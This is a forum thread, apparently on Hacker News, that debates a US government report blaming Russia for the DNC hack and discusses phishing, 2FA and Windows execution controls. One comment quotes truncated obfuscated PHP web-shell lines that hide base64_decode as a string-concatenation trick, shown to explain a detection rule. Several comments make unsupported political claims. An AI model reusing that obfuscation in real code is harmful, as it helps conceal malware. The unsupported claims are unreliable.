The report then discusses when the attackers did and mitigation strategies.

>This report merely points the finger at Russia; it does not purport to substantiate that allegation.

That's the point, its just another completely baseless, unsubstantiated accusation. This report contains nothing that suggests that the Russians were any more likely to be the source of the hack then countless other entities. The problem is that these baseless claims are being presented as evidence and being consumed uncritically as such. Take for example the headline in PcMag:

>Hacking Evidence in Hand, Obama Sanctions Russia



Are you trying to live up to the username or using it ironically?

This report doesn't claim to substantiate those allegations. It merely repeats them.

By the Big Lie theory, what's the diff?

This (complaining about the lack of evidence) just seems ludicrous to me. Does the FBI have a history of declassifying stuff like this so that randos on the internet can independently verify its conclusions? When high-level intelligence people collude to lie to the American people and discredit a president, do they usually do it via press release clearly written by a PIO?

The accusation that people who find this credible are uncritical is unfounded and insulting. The question is not "would someone in a government agency lie for political reasons," it is "would this many people, in a bunch of different agencies that have a history of lying to and competing with and distrusting each other, all sign on to the same lie, publicly, even though it's almost certain to be disproven in a few months."

Meanwhile, here's the alternative theory:

1. Some Russian intelligence agency hacked the DNC's email servers

2. They left behind evidence

3. The FBI/NSA//DHS/etc found that evidence

4. They classified it and aren't going to put it in a press release

None of those are the least bit hard to believe, and they are collectively WAY easier to swallow than this hypothetical vast, high-level conspiracy to discredit Trump or whatever it's supposed to be for.

Except that this is a sort of exclusion of the middle; you say "here's the alternative theory", but there are other even more likely possibilities. Here's one:

1. The DNC and their members are generally ignorant of good security policy and had an easily hacked system.

2. Some Russian intelligence agency hacked the DNC's email servers.

3. A bunch of other people/hackers/groups hacked the DNC's email servers, as it was "left out in the open", so to speak, and was a trivial target..

4. One group at least used trivial methods to do so and left behind evidence.

5. The FBI/NSA//DHS/etc found that evidence.

6. One of these hackers passed information to WikiLeaks. WikiLeaks has denied that it was Russians who did this.

7. The FBI/CIA claim that the Russians hacked the DNC servers.

8. The press and political opportunists jump to the conclusion that it was the Russians who released this information to Wikileaks.

9. The FBI/CIA classified what they found and aren't going to put it in a press release.

Point 7 is the one you're supposed to be trying to explain. The FBI, CIA, DHS and NSA have all said, in plain language, no anonymous sources, just regular old press releases, that Russia hacked the DNC. The reasons they might say this are a) they believe it due to some evidence they are not releasing, and b) ???. Theory a) seems pretty believable, and I haven't heard a b) that sounds remotely plausible yet.

Whether someone else also hacked the DNC would be interesting to know, but it doesn't really impinge on the question of whether there is or is not a vast-but-also-ham-handed-and-kind-of-contradictory conspiracy pushing theory a.

Point 7 is the one you're supposed to be trying to explain

Except that point 7 isn't at all controversial. EVERYONE hacks EVERYONE ELSE in cyber-espionage; even Canada was probably hacking the lame-ass security DNC email server, if only to fill a dossier. Remember that Clinton was set to be the next president of the United States; it is very much in Russia's (and anyone else's) best interest to know as much about her and her team as they can learn. It's the job of American spooks to prevent this, and they completely fucked it up.

Frankly, I find the suggestion that telling voters more about their candidate constitutes 'interference' to be repugnant; but assuming that we are going to engineer a scandal about this, we need to ask whether the Russians released that information to Wikileaks? All of the evidence (ie what Wikileaks says) says otherwise.

Er, the parent was replying to a poster who implied he did not believe "point 7."

>Frankly, I find the suggestion that telling voters more about their candidate constitutes 'interference' to be repugnant

Really? By this argument, I take it you believe political candidates' email (or cough tax returns) should automatically be made public?

Much as I agree with transparency, I think we need to recognize that everyone--including political candidates--has some right to private communications.

> but assuming that we are going to engineer a scandal about this, we need to ask whether the Russians released that information to Wikileaks?

The publicly released circumstantial evidence about Russian backing of "Guccifer 2.0" is fairly convincing, I would say. But (contrary to your claim above) the media have not "jumped to the conclusion" that the Russians were the ones who released the leaked emails; the FBI claimed* Russia was not merely behind the attacks but behind the leaks.

You all can debate the merits of trusting intelligence agencies or not, but the situation you described--in which the IC only suggested Russia was behind some intrusions but not the leaks--is not in fact the world we live in.

* http://www.wsj.com/articles/top-russian-officials-shift-away...

>Much as I agree with transparency, I think we need to recognize that everyone--including political candidates--has some right to private communications.

No, they don't, unless you see the need for them to act against our interests without our knowleddge because markets or something, or see some sort of right for them to rule others.

So you believe that all email communication from all elected officials and candidates should be made public?

What about non-email communication? Face-to-face conversations should all be public? Does this extend to classified briefings? Should, for example, discussions of "Olympic Games" have been public before it was executed?

Point 7 wasn't that the hack took place or the matter of who did it, it's the three-letter-agencies publicly accusing Russia of it. They did so because a) they believe it's provably true, or b) ???.

b) It justifies their ongoing employment.

> Except that point 7 isn't at all controversial. EVERYONE hacks EVERYONE ELSE in cyber-espionage

It's like in Germany where they're up in arms against this and seem to have forgotten the revelation that the USA was tapping Merkel's phone...

> b) ???

How about the FBI/CIA/DHS/NSA don't like people who don't play by the accepted rules sticking their nose into their business, so they tell a little white lie to try to avoid that?

The three letter agencies have had plenty of people killed before, so "they'd never do that" isn't going to get you very far.

Think this through. Multiple people in the FBI, CIA, DHS, and NSA all decided this? Together? Did they have meetings? And no one is spilling the beans, even though there are maybe dozens or hundreds of people in on it? Not one of them has more to gain by revealing the conspiracy than by keeping silent? And they're all so confident that no one will squeal that they're having press releases now? And the point of this whole treasonous conspiracy was to cause a minor inconvenience for their soon-to-be boss?

That's more believable than "Russia hacked the DNC and the FBI was honest about it"?

Haha, I know, it does sound rather crazy. However, once again I will play the Snowden card: all of that was called crazy conspiracy talk, because there would be too many people involved who <insert your words here> so thinking that is just crazy.

It's certainly not crazy to not trust these people. Deceit is their job.

Not to mention the number of dinosaurs still in each institution that can be simply told what to believe when it comes to technology.

Could you please link to these press releases?

It's been very difficult for me to wade through the muck on this one.

I'm referring to parent of this whole thread, which (briefly) is a press release that says, "Here are some ways you can protect yourself from the kind of attack the Russians did on the DNC" and then goes on to describe spear-phishing.

The reason this is unusual is because the intelligence agencies are being so matter-of-fact about this. They're not trying to convince anyone, like they did with Iraq's WMDs. They're not giving out pointed leaks and then officially denying them. They - meaning multiple agencies - are jut saying, "Yeah, it was Russia", as if it's a settled issue.

The conclusion I draw from this is that there must be very strong evidence. Could that evidence be forged? Sure! (Another reason why the "show me the evidence or I won't believe it!" people sound nutso - why would they think it wasn't forged?) But to believe it's forged we need at least a plausible theory as to who would forge it and why. Right now, I'm drawing a blank.

Absolutely any state that would enjoy the benefits of the distractions that comes with an escalated political conflict, Israel, China, Saudi Arabia. Think about how quickly Erdogan switched from being US ally to being best chums with Russians and helping with the peace negotiations with Iran after the attempted coup. Was it Russia, was it US, what was the motive, does one have motive to frame the other?

It's not their job to do the convincing, they leave that to CNN, MSNBC or FOX. They just give some superficial material to get the ball rolling. There was next to no in depth articulation as to how this was definitely Russia. They're still twiddling their thumbs and saying 'we're confident' it was them.

You're suggesting that a foreign country supplied the FBI with forged evidence, and the FBI said, "Well, this doesn't match our own investigation, but I guess we'll just assume it's true anyway, now let's announce it to the world on our official letterhead"? Does that sound likely to you?

Do the intelligence agencies actually agree on this as unanimously as you're saying? Here's a quote from the testimony of James Clapper on Russia/Wikileaks connection:

"The evidence there is not strong" https://www.c-span.org/video/?c4631568/clapper-wikileaks-con...

That was from a month and a half ago. It seems more likely that he's changed his mind or seen new information than that the DHS and FBI are putting out joint press releases that contradict the beliefs of the DNI, but who knows, maybe the DHS/FBI leadership is involved in some kind of squabble with Clapper or something....?

You're assuming this is true and coming up with speculation. Meanwhile, we can look up the names of many of the reporters spreading these rumors and find that they coordinate with the DNC.

Also, you think it's a conspiracy theory that the DNC would attack Trump? So... you don't seriously think that the RNC's media allies attacked Clinton? That's, uhh, just not how it works.

The DNC has very good reasons to deflect this one. They funneled all the state-level money to Hillary and made their losses worse. They helped promote Trump and the other "pied piper" candidates in the media early on. Their token opponent, Sanders, got far more enthusiasm than Hillary and both candidates under-performed past ones, with Trump edging her out based on smaller losses and working the electoral college to his advantage--a failure reminiscent of how Obama beat Hillary by focusing on delegates. They have to pin the failure on someone else for their own survival. If the average voter saw the actual emails and realized just how much the DNC orchestrated just to shoot itself in the foot here, they'd demand their replacement.

The FBI has a history of political activism, to put it lightly. Here's a fun one: https://en.m.wikipedia.org/wiki/FBI–King_suicide_letter

You're being foolish if you trust a word the FBI says without solid evidence.

I don't! Dammit, read the post! No one on god's green earth trusts the FBI at their word, but that doesn't mean you can assume the opposite of what they said is true without evidence!

I suppose that depends on the expected reaction to either believing or not believing. In this case, from my perspective, I see two intended reactions to the claims of Russian subversion:

1) To delegitimize the President-elect 2) To foment war with Russia

I didn't vote for the guy but I don't think he's near so bad as his political opponents try to paint him. I'd like to at least give him a chance and to whatever degree he turns out to suck, I'll still blame the Clinton campaign for promoting controlled opposition 'pied pipers' rather than promoting a robust debate in the interest of the American people.

Wrt #2, I will certainly demand very strong evidence before yielding any resistance to that notion.

Seriously. Clapper lied directly to congress under oath on TV. The whole "they know whats best for us and our only choice is blind faith" attitude is really disturbing.

> The whole "they know whats best for us and our only choice is blind faith" attitude is really disturbing.

This is so, so insulting. There is no way a fair observer could read the comments here and conclude that the people who find Russia hacking the DNC credible do so because they have blind faith in Clapper or the FBI or anyone else.

> There is no way any a fair observer could read the comments here and conclude that the people who find Russia hacking the DNC credible do so because they have blind faith in Clapper or the FBI or anyone else.

Isn't that what you were more or less saying here: https://news.ycombinator.com/item?id=13281736

No. I believe the official version (that the reason the intelligence agencies are accusing Russia of hacking the DNC is because believe it did) because the alternative is less plausible and there's no evidence for it. That's pure Occam's Razor, no faith involved.

The FBI has lied and will lie again, getting me to believe they lied about something is not hard, but they don't generally do it in big, obvious ways that are easy to disprove and involve a lot of co-conspirators and don't accomplish anything.

That's not how Occam's razor works. You don't pick the most likely single outcome and then just assume that to be true with 100% confidence. Occam's razor is just an informal statement of the fact that you should assign a higher a priori probability to simpler hypotheses. It doesn't mean you should ignore any marginally less likely hypothesis.

Please stop accusing people of being 100% confident. It's such a weak, insulting tactic. What is the alternate hypothesis that's "marginally less likely"?

(Please remember what question we're trying to answer. It is not "Who hacked the DNC?". We are not in a position to know; hell, we don't even know there was a hack. It is also not "Is the FBI trustworthy?" Of course they're not. It is "Why are US intelligence agencies saying they have proof that Russia hacked the DNC?" The base hypothesis is "Because they do." The alternate hypothesis is what you're supplying.)

> Please stop accusing people of being 100% confident.

To quote you:

> No. I believe the official version

> What is the alternate hypothesis that's "marginally less likely"?

That Russia didn't hack the DNC. I think it's actually marginally more likely than that Russia didn't hack the DNC than that they did, but I was humoring you.

I repeat:

> "Why are US intelligence agencies saying they have proof that Russia hacked the DNC?" The base hypothesis is "Because they do." The alternate hypothesis is what you're supplying.

What do you mean by "base hypothesis" or "alternate hypothesis"? Those aren't real terms in hypothesis testing. I think you might want to do some reading on Bayesian reasoning, and its relationship to Occam's razor.

Those are not highfalutin technical terms, just casual everyday language. Stop waffling and tell me what this theory is that I'm a brainwashed sheep for not believing!

Alternative hypotheses are that they don't like to have their activities monitored, and they like people that can be manipulated with propaganda. Trump seems potentially problematic in both respects.

If these organizations are involved in questionable undertakings (it's their job, so I think we can agree the answer is yes), it's not much of a stretch of the imagination that they like to operate without supervision.

everyone is innocent until proven guilty... there is no any prove in report that hacking even took place, date, time, size of materials, exact mechanism of attack, which email address was compromized, which link was attached to email, what happened after link got openned, why outlook did not block link, why anti virus did not block exploit be installed, which exploit , why firewall accepted outcoming traffic to unknown source outside of trsuted network ... why russians ?

I don't necessarily disagree, but a guilty charge shouldn't be based on the "most plausible" explanation.

I, for one, wholly support the "insulting" of the treasonous reptiles that infest our secret agencies, on every possible occasion. The nation and world would be better off if they all jumped in a lake.

Do you have any evidence to back up your utterly ridiculous claims?

And yes, claiming that's all the evidence that exists is complete bullshit.

The purpose of these "reports" and the retaliation against the Russians is to undermine the legitimacy of the Trump presidency. There's no need for proof, just innuendo and allegation would do. Pretty sick of technology got dragged through the mud for political purpose.

This is the least plausible conspiracy theory I've ever heard. C'mon man. Imagine you're whoever-it-is you think is behind this, and you want to discredit Trump for whatever reason. What would you do?

You've got access to all of his tax returns, and all the sealed details of his divorces, and all of his medical records, and all of his business records. You've got a whole squad of spies working for you, you can fabricate evidence, whatever you want. And this is a guy a guy who has outstanding loans from Russian banks in the hundreds of millions of dollars, and who has cheated on at least two of his wives. And this is what you go with? Accuse someone unrelated to him of hacking in to someone unrelated to him? That's your big plot? And you wait to do it until after the election? Via press release?

The Democrats (of whom I am one since birth) are using "The Reds did it!" as a tried and true excuse to explain the utter failure of their muddled, ineffective ideology on the national stage.

It's face saving through and through. And it makes a better story than "Trump beat us because we half-assed this election."

To be fair, I think three things:

1. The Democrats ran a crap campaign based (in part) on racism and sexism. The probably would've lost by a wider margin to a ham sandwich than they did to Trump.

2. Russia probably is behind the DNC hacks and definitely tried to meddle in the election.

3. Russia definitely took hints on what would be useful from Trump and Trump probably actively collaborated with them.

Just because I think Russia meddled in the election doesn't mean that either domestic party ran a good campaign, or that Russia was ultimately able to sway the election.

The only question I want the intel community to weigh in on is the politically charged one they're avoiding: did Trump actively collaborate with a foreign power during the election?

That question is of pressing import (and disqualifies him from being president if he did). The rest of it is just details.

I think the parent of your post was implying there are 2 parties here: the one responsible for the hack, and the people saying the hack was the Russians.

All those you mentioned don't interfere with the election process. The last couple weeks all I have heard were Russians rigging the election process to help elect Trump, i.e. the election result is not what is should be, i.e. Trump's presidency is not completely legitimate.

It has been couple weeks of non-stopped Russian blaming from the news. So far there's not much direct evidence beyond a unnamed CIA source. Now this lackbuster report and Obama expelling Russians happen on the same day. It really smacks an orchestrated political propaganda campaign.

Mind you I am not a blue dog Republican. I've voted 16 years straight for Democratic tickets including twice for Obama. Democratic Party has been a real disappointment this year, and Obama making this last partisan political act really tarnishes his legacy.


I disagree. All signs point to Russia wanting peace with the US, and I think they are cozying up to Trump so he will roll back the sanctions that have been choking the Russian economy since 2014 or so.

Clinton was the one saber rattling against Russia during the election, not Trump. So assuming your theory is Russia hacked the DNC, their motivations seem to be to avoid war, not escalate.

However, there is definitely a cultural war going on within Western civilization between cultural Marxists wanting a global, totalitarian state and libertarian civic nationalists wanting a decentralized, limited state.

Where Russia comes in, and what's really funny about all this, is that the "right" now finds itself aligned with former Soviet communists and the "left" finds itself aligned with the Islamic caliphate. Politics can make strange bedfellows indeed.

> This attacks could be easily mitigated. [...] second, we should start using physical cryptographic keys instead of passwords

Man--I like the way you think, I really do, but this is not "easy". Technical simplicity and social ease are vastly different, and it's usually the humans who are getting hacked.

Can confirm. I did tech at the DNC in 2012. We pushed to get senior staff using 2FA and ran internal phishing drills. Obviously didn't take.

That's super annoying. The 100 person startup I'm at uses 2 factor authentication! It's so easy these days there is no technical excuse anymore.

I'd be willing to bet the 100 person start up you're part of is largely of a different demographic than the parent's DNC staff group.

Hmm. Maybe we should chat? Not directly related to this, but I'd love to pick your brain. Email's in my profile.

I honestly think politicians have stopped using email. This leak was so inconvenient that it has changed behaviors.

If an organization is working with sensitive data maybe they should invest some resources into security. I understand it is not easy because companies like Microsoft have been releasing poorly designed software (with things like autorun for USB drives) for 20 years and it still is the leader. But we have to advance step by step. For every single person needing executable attacments there are maybe million users who can run them without understanding the consequences.

I mean, you're talking about the campaign of a person who was running while being investigated for circumventing security procedures. Regardless of what you think about those topics or their validity, is it that surprising that the campaign wasn't up to par on the security front?

You're conflating 2 different stories. HRC had no say over how the DNC ran their email nor were they subject to any special regulation as a private organization. Although it's been widely speculated there's yet no proof that HRC's private email server was ever hacked.

The RNC was hacked as well, although they similarly circumvented the same security procedures.

That the RNC was also hacked seems to be a popular, but probably false, meme.


Belief in this will likely depend on who someone trusts more, spokespersons for the RNC, or the New York Times and the Washington Post.

From the New York Times article: "One senior government official, who had been briefed on an F.B.I. investigation into the matter, said that while there were attempts to penetrate the Republican committee’s systems, they were not successful."

From the WaPo: "U.S. officials said the Republican National Committee’s computer systems were also probed and possibly penetrated by hackers tied to Russian intelligence services, but that it remains unclear how much material — if any — was taken from the RNC."

There were a number of significant caveats in the NYT and WaPo reporting of this that people have ignored because it confirms their existing assumptions. Probably by design; it lets the papers push their preferred narratives whilst giving them something to fall back on if it turns out not to be true.

My other post is flagged and downvoted by well, yeah, I'll keep it civil despite them.

But the point was, The russian hacker forums are orders of magnitude better than anything offered in English, and virtually every single one has made no secret (other than you need to read Russian) that they were working hard all year to get Trump "elected". From spreading rumours, distributing any dirt they could elicit, to boots on the ground playing with the voting machines. There was even talk of cash incentives from George Soros and Peter Thiel.

WaPo and NYT undoubtably have journalists that both read Russian and Frequent such forums. But it will be a while before they get the courage to go public with just how much US infrastructure is now completely pwned by the Ruskies. RNC and DNC only made headlines because some of the haul got sent to wikileaks aka FVEY.

My personal opinion is "America" deserves it for all the effort they put into making systems insecure.

"Maybe" they should. But almost none of them do.

That's why it's a social problem, not a technical problem, yeah?

I think it is rather the problem of poorly designed software. It is impossible to make millions of users to set up some secure configuration, install firewalls etc.

The software should have secure default settings, if a user is not a computer engineer he should not be able to execute files from email attachments.

I think it's a generational thing. Americans of a certain vocation and certain age and older tend to have no idea about how this whole Internet thing works. No matter what their education level or achievement level. Obama held onto his Blackberry for almost 2 years after SS told him you can't use that thing.

I suspect what needs to happen is each branch of government needs to have infosec people assigned to it that sets standards and policies around this stuff. If they don't comply there have to be consequences.

It's not necessarily a generational thing. John Podesta was suspicious and sent the phishing email to campaign IT. Clinton campaign IT screwed up and told him to click the link and reset his password. Podesta is in his 60s and the IT people look like hey we're in their 20s.

I think it's a generational thing. Americans of a certain vocation and certain age and older tend to have no idea about how this whole Internet thing works. No matter what their education level or achievement level

That is an impressively dismissive statement.

Well, we've been working on making it pretty easy over at Userify! but, truthfully, we're only tackling one piece of the puzzle (SSH keys). Your point is well taken about websites/web apps designed for mere mortals.

TLS client auth is really pretty much a dead letter: it's not easy at all. The biggest impediment for widespread TLS client auth seems to be that CA's are involved.

U2F might help.. and widespread MFA/2FA. Maybe we shouldn't be just tossing out passwords just yet, but just pushing for full MFA support for mission critical apps.

> By the way iOS is the only popular operating system I know that doesn't allow to execute files downloaded from web or emails.

Windows 8, 8.1, and 10 don't allow it either. SmartScreen will block unsigned executables by default[0]. Enterprise customers should be using AppLocker which does a lot of what SmartScreen does, but with more flexibility and control.

The issue arises when [bad] System Administrators disable SmartScreen because it is a "hassle" and don't deploy AppLocker in its place. This effectively sends their users back to a Windows 7 level of security.

If Microsoft forced either SmartScreen OR AppLocker, then we'd have people on here screaming about freedom, Microsoft is evil, "Embrace, extend and extinguish," year of the Linux desktop, and so on. This is the best they can without treating System Admins like babies (even when they're going to use that power for "evil").

[0] https://blogs.msdn.microsoft.com/ie/2012/08/14/microsoft-sma...

Isn't there a history of signed malicious things? For example:


There are a handful of scattered examples.

Fortunately because of how signing works it makes malware that is signed incredibly easy to detect, since by the very nature of the signature the malware's contents cannot be altered.

Plus signing is costly, and that within itself can make malware attacks uneconomical. It also makes getting a signature rather complex since you need fake identification and payment to avoid being carted off by the authorities.

Overall signing requirements are a huge net win for the "good guys." And while it isn't a hard security boundary, it is a damn effective one in the real world.

"If Microsoft forced either SmartScreen OR AppLocker"

Meh, just add a button or clickable link that allows the sysadmin to swiftly disable such warnings. Just make sure to put a scary-enough disclaimer that doing so can expose you to very bad, malicious stuff, from ill-intentioned people. It might get more application publishers to implement signing, just as Vista and 7 got rid of the "run everything as administrator" mentality through the use of UAC warnings.

Whatever the default level SmartScreen is already has a ding and a warning pop up about unknown executables. But it's amber and not red, and most people just click through it (I know I do).

I think there should be a separate UI for installing or running a downloaded program (with a huge red warning) so the users cannot accidentally run anything.

The problem here is that the system is not secure by default, one needs to hire a qualified specialist to set everything up. By default the user can run executable attachments or files downloaded from browser and it is a wrong design decision made many years ago. Users do not understand what is an "executable file", they got used to click an icon to see the file contents. This is just poorly designed UI that helps to deceive a user.

> If Microsoft forced either SmartScreen OR AppLocker, then we'd have people on here screaming about freedom, Microsoft is evil,

There could be a separate UI for installing software or even a package manager. Microsoft doens't want to change anything because it is still the leader and earns huge profits.

It is secure but default. Out of the box SmartScreen blocks unsigned executables like I stated above.

System admins are going out of their way to disable default protections.

Also Windows 10 has a package manager and app store.

>The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search malware in PHP files. It is interesting that they have replaced digits in 'base64_decode' function name with regexp as if there were any other similar functions.

If you read that regexp carefully, it's more complicated than that. It doesn't match base64_decode, but it would match `='base'.(32*2).'_de'.'code'`. That's obfuscation in the payload, and in another comment I linked to some code that uses exactly this unusual (and pointless) obfuscation [1]

[1] https://news.ycombinator.com/item?id=13281008

> The report also contains a pretty useless firewall rule

For what it's worth Yara is not a firewall. It's essentially an intelligent grep for incident response. An IOC is an indicator of compromise, so it's after the fact not a preventative measure.


It should be noted blocking execution isn't the problem, its the access an unknown executable has to the host system.

A well hardened MAC system, which requires no effective user intervention, can limit access of arbitrary programs to a minimal set of files and devices to stop bad actors from actually getting anything without the user having to modify the MAC policy.

Check out the Mooltipass it's the hardware security device I want but can't afford because of college.

Can experts weigh in on the utility of this thing? To my ignorant eyes it looks excessively complicated.

To save you a search it's here: https://www.themooltipass.com/

The idea is you put your passwords into this box. This box can only be opened with a Chip&Pin card. This magic box can be backed up and restored if ever lost or stolen. The magic box is also "physically-ish" sperated from the computer. It's Impossible (TM) to compromise the security of all the passwords in the magic box. It goes something like this.

Setup goes like this:

   1. User buys device which comes with keycards.
   2. User selects pin code for their device
Usage goes like this:

   1. User attempts to login to site 
   2. Browser plugin requests login details from device
   3. User is prompted for chip & pin from the device
   4. User puts card into device and inputs pin
   5. User clicks a button physically to aprove transaction
   6. If correct data is sent to the browser for login
   7. Subsiquent chip and pin signins aren't needed for X timeout
The interaction is more 'tedious' for some people but it's not meant for the people who are concerned with typing in a 4-digit pin. It's meant for people who would otherwise have to remember 20 digit alpha-num-sym passwords for 30 different accounts for which this is much easier and safer to do. It's also something people know how to do. If you've gone to a super market you are now prompted for Chip & Pin. People are already motivated to learn how this works (want your groceries for the week? Use the chip and pin!).

On the other hand, the average person doesn't need code words to get access to a protected resource. Bar "special organizations" I'd say there are very few people who are trained natrually into the concept of passwords. It's simple but it isn't done nearly enough for everyone to understand it which is in stark contrast when compaired to using a credit card with a pin code. Also, they could use similar or even the same pin code as their bank pin if they aren't concerned about security.

>I have looked through the report. The only useful information was brief description of attack methods, everything else looks like a list of general recommendations one can find on the OWASP website.


Look again, they handed you more than enough information.

>The report also contains a pretty useless firewall rule named "PAS TOOL PHP WEB KIT FOUND" that can be used to search malware in PHP files. It is interesting that they have replaced digits in 'base64_decode' function name with regexp as if there were any other similar functions.

  root@:~/super_secret_govt_malware_samples# grep * -e bas|tail -n2
  D285115E97C02063836F1CF8F91669C114052727C39BF4BD3C062AD5B3509E38:<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'FeBvsTxs6EyYpYb/gJ9ckCbVgYYH9D56SKL+O6KdPjkDV91JgHr1g8WRH7/uYOda3hUgVLO064UXPF5K
  DA9F2804B16B369156E1B629AD3D2AAC79326B94284E43C7B8355F3DB71912B8:<?php $l___l_='base'.(32*2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', 'QbO8tTv2NBoj4kUpujJlanEQeWDR+lrAJa6TWEnQEGF/uIiq3/G4ox/YCpaqsd6+QRNaT2pbpyBIDnlo
Why is everyone trying so desperately to attack and discredit this report?

It is interesting to see the strongly negative positions that some people take on any of these reports. It is almost like folks can have ulterior motives or know very little about how to protect sources and methods.

> Why is everyone trying so desperately to attack and discredit this report?

Because half of the US voting population are heavily invested in it being false.

Ok, you are right, I didn't notice the multiplication sign. This rule really can detect infected PHP files.

Folks, the point of this report is not to justify the punitive actions taken today. It is to provide information that companies can use to protect themselves against similar attacks in the future.

So if you judge it by whether it "makes the case" against Russia, it will be lacking. We don't need 100 comments pointing that out.

You're ignoring the political context in which it was released.

1. Released the same day as the announcement of formal Russian Sanctions

2. Released the same day US made 35 "diplomats" (aka. known Human Intelligence Officers) Persona Non Grata. Which is a big deal.

This type of document is not intended to "make the case" because we don't do that.

Making a case for something by definition, would reveal sources and methods which we highly guard. It also opens the administration up for scrutiny because there are many pieces which cannot be revealed because of classification - so it's impossibly to fully "make a case."

This type of report does however hint suggestively and point in the direction of support. They just let you put the pieces together.

In fact they don't have to put anything out and most people wouldn't even know to ask (outside of possibly FOIA, which won't go far in these cases).


It appears to confirm what we knew: the DNC's failure to adhere to basic security protocols, which would be enforced in any corporation with more than a couple dozen employees (edit: or not, see eropple's comment below), allowed its systems to be compromised by script kiddies (for political reasons, the USG insists these script kiddies are sponsored by the Russian government, and insists we take them at their word).

This document says the attack would've failed if the DNC had watched out for SQL injection and if DNC staffers had not fallen for a phishing scheme. We're supposed to believe only a nation-state could've conducted these attacks? This is "Baby's First Hack" level stuff.

This only further proves the government's propaganda policy for dealing with prominent cybersecurity breaches: blame it all on a foreign boogieman, as they did in the case of the Sony leak, so that the public doesn't catch on to just how very vulnerable all their electronic data is to practically anyone with the inclination to attempt to steal it.

> which would be enforced in any corporation with more than a couple dozen employees

No they wouldn't, and you are one of the people here who I would say should very well know it. :p

The DNC screwed up, but the overwhelming majority of everybody else screws up to this level or worse on the regular.

Yeah, you are completely right, and I completely agree, as I imply later in the post. Such mistakes are extremely common across the spectrum, at companies large and small alike (remember when American Express accidentally exposed an internal debugging application? [0] :O). Cybersecurity is still very difficult for everyone, and I don't mean to imply any differently.

My quip was meant to emphasize that the security breaches described are basic, and likely could've been blocked if the DNC had, at the time, been following good security practice. Many corporations withstand such attacks routinely (and as you note, many don't).

The penetration of the DNC was not something that required professional-level skill, let alone the resources of a nation-state.

[0] http://www.securityweek.com/amex-developers-leave-debug-tool...

What it really requires is the blind eye (or knowing nod) of a nation state, since with the level of unuttered evidence (and the private orgs named which no one seems to be mentioning here) the idea that "we won't prosecute you if you do this" is the nation-state sophistication here. In the US you'd normally face justice for this, regardless of the locale or the ease of the break-in.

While the methods used were very simple, I have an opinion why this could be done for some government or political party. The emails and data from a political party are probably very boring stuff, so a typical hacker would not bother to spend a lot of time sending thousands of phishing emails to get access to them. And later he would have to read through them to find some facts the mass media would be interested in. Usually hackers hunt for things like credit card numbers or fame.

Hackers have been targeting boring government docs for as long as there's been hacking, sometimes just for laughs, bragging rights, etc.

If all the docs are boring, isn't that all the more reason to think that a nation state had nothing to do with this?

The NSA would've intercepted your new router in the mail with a backdoor and could've used a TEMPEST van to read your screens from miles away. I have to believe those mighty Russian hackers have figured out comparable tricks by now and aren't reliant on people falling for idiotic phishing scams to get their information.

I mean, they have Snowden, who showed us the NSA's TAO programs... right?

Why bother when it wasn't needed?

They have the motive to do it, as much or more than anyone else and certainly the capacity. They are tied to a disinformation campaigns [1] that seem to have the goal of sowing suspicion between allies who oppose them and have everything to gain by swaying our political process.

That isn't enough evidence of course, but I'm surprised by the suspicion here and I can only chock it up to the increase in cynicism that is partly a result of these very actions. Because the Bush administration managed to finagle the intelligence enough to justify the war in Iraq we can just ignore our intelligence agencies whenever we want, right?

Internal bullshit like what was going on at the DNC is annoying, frustrating and unfortunate but people are falling for the trap hook line and sinker. This happens everywhere, you can damn be sure it was going on at the RNC as well but republicans wouldn't have abandoned their party (at this point its pretty clear nothing can make a fair number of them abandon their party) but independents and some liberals are doing exactly what the hackers want (whoever they turn out to be, likely the Russians): we are getting cynical and despondent. Rather than getting involved and saying we should clean house, its like "well if you didn't suck so much you wouldn't have lost." while doing nothing to make things suck less.

[1] http://www.nytimes.com/2016/08/29/world/europe/russia-sweden...

Because an attack like that gives you short term access which isn't particularly valuable to a nation state. It was quickly found out and stopped.

Also the report doesn't say anything about not having your password literally be password!

Exactly this. If it was just a recommendation notice, why release on same day. Plus the thing is titled: "Russian Malicious Cyber Activity"

The Obama administration announced they will release evidence about the hack in "3 weeks". So they will be making the case. It will obviously just be redacted.

It seems notable that many of these comments are jumping on this for not providing proof that it was Russia, when that was not the intention of the report.

The first page states-

>This JAR provides technical indicators related to many of these operations, recommended mitigations, suggested actions to take in response to the indicators provided, and information on how to report such incidents to the U.S. Government.

The bloomberg article I read (http://archive.is/j5wRd) presented it as evidence. Maybe other publications are doing the same.

>As part of the administration’s response, the FBI and Homeland Security Department also released a report with technical evidence intended to prove Russia’s military and civilian intelligence services were behind the hacking and to expose some of their most sensitive hacking infrastructure.

The "evidence" cited is not the handful of unclassified details included, it's the fact that the FBI and DHS are willing to go on record publicly accusing Russia. There are no asterisks or weasel-words or "allegedly"s. Just a clear "Russia did it."

There are only two possible explanations for that:

1) A massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax that will easily be unraveled by the incoming administration in a few months

2) There is clear and damning evidence that Russia did it, but it's classified

I'd guess a third option, actually: It's just a best guess, but they don't like being questioned.

If they had damning evidence it'd be in their interest to release it.

Not if it would give any humint sources away and they may have kicked out people to allow a source to step into their shoes - as the UK did to put there man in as the Resident in London

It's somewhat obvious from the context but for anyone not familiar with military jargon I think the parent post meant to say "humint" instead of "humit" which is short hand for "human intelligence" or in layman's terms "spies".

oops my bad

Of course, Iraq and WMD do little to build confidence.

Not that I don't believe you -- motive and opportunity for Russia are crystal clear here, and given that the results of the election are not going to be overturned, I see little gain for the current administration to lie about this.

>1) A massive conspiracy in which the leaders of practically the entirety of the US military/intelligence community are willing to go on record with a hoax that will easily be unraveled by the incoming administration in a few months

Unless the actual perpetrators were the US intelligence community and/or the incoming administration. Then they could both hide their tracks or have no reason to unravel this. But why suspect the group with the most to gain or the community with the most experience doing this? It's not like there's any other examples of a Republican politician breaking into the DNC to tap their communications, using the intelligence agencies to help cover it up...

What does the intelligence community have to gain by perpetrating this hack?

Billions of dollars plus whatever power comes from picking the president and presumably having a potential deepthroat if they don't behave. And remember, the intelligence community is not unified. Even though Obama has been a huge ally of the intelligence community, not all branches got the same deal.

Ok I guess I meant specifically, is there any reason to think the intelligence community would prefer Trump? Presumably they would prefer someone who was more interested in foreign involvement, and less likely to provoke mass donations to privacy and civil rights organizations.

